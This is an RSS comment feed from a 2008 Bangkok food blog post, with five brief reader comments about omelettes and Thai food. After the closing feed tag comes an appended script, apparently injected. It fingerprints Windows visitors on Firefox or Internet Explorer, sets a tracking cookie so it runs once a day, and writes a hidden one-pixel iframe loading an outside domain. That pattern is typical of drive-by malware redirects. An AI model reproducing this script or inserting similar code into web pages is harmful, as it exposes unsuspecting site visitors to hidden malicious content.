<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Poj Spa Kar</title>
	<atom:link href="http://www.austinbushphotography.com/2008/01/poj-spa-kar.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/poj-spa-kar.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Thanaads</title>
		<link>http://www.austinbushphotography.com/blog/poj-spa-kar.html#comment-1098</link>
		<dc:creator>Thanaads</dc:creator>
		<pubDate>Thu, 17 Jan 2008 09:39:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/01/poj-spa-kar.html#comment-1098</guid>
		<description>Why go out for Thai food when you can make it at home?&lt;br/&gt;&lt;br/&gt;&lt;a&gt;http://cuisinethai.blogspot.com&lt;/a&gt;</description>
		<content:encoded><![CDATA[<p>Why go out for Thai food when you can make it at home?</p>
<p><a>http://cuisinethai.blogspot.com</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: oneditorial</title>
		<link>http://www.austinbushphotography.com/blog/poj-spa-kar.html#comment-1096</link>
		<dc:creator>oneditorial</dc:creator>
		<pubDate>Thu, 17 Jan 2008 05:13:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/01/poj-spa-kar.html#comment-1096</guid>
		<description>I am hungry.&lt;br/&gt;&lt;br/&gt;I love omelette.</description>
		<content:encoded><![CDATA[<p>I am hungry.</p>
<p>I love omelette.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Nick</title>
		<link>http://www.austinbushphotography.com/blog/poj-spa-kar.html#comment-1095</link>
		<dc:creator>Nick</dc:creator>
		<pubDate>Thu, 17 Jan 2008 03:35:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/01/poj-spa-kar.html#comment-1095</guid>
		<description>Saw the piece in the Times and was happy to see you credited as the all-knowing Bangkok food source.  Only 3 1/2 months until I arrive to eat everything is sight...</description>
		<content:encoded><![CDATA[<p>Saw the piece in the Times and was happy to see you credited as the all-knowing Bangkok food source.  Only 3 1/2 months until I arrive to eat everything is sight&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anonymous</title>
		<link>http://www.austinbushphotography.com/blog/poj-spa-kar.html#comment-1094</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Thu, 17 Jan 2008 02:37:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/01/poj-spa-kar.html#comment-1094</guid>
		<description>Do they serve omelette in spa these day?</description>
		<content:encoded><![CDATA[<p>Do they serve omelette in spa these day?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: QlinArt</title>
		<link>http://www.austinbushphotography.com/blog/poj-spa-kar.html#comment-1093</link>
		<dc:creator>QlinArt</dc:creator>
		<pubDate>Wed, 16 Jan 2008 17:37:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2008/01/poj-spa-kar.html#comment-1093</guid>
		<description>I don&#039;t know why I always ready your blog right before lunch or dinner when my stomach starts growling.  I eat your pics with my eyes...</description>
		<content:encoded><![CDATA[<p>I don&#8217;t know why I always ready your blog right before lunch or dinner when my stomach starts growling.  I eat your pics with my eyes&#8230;</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

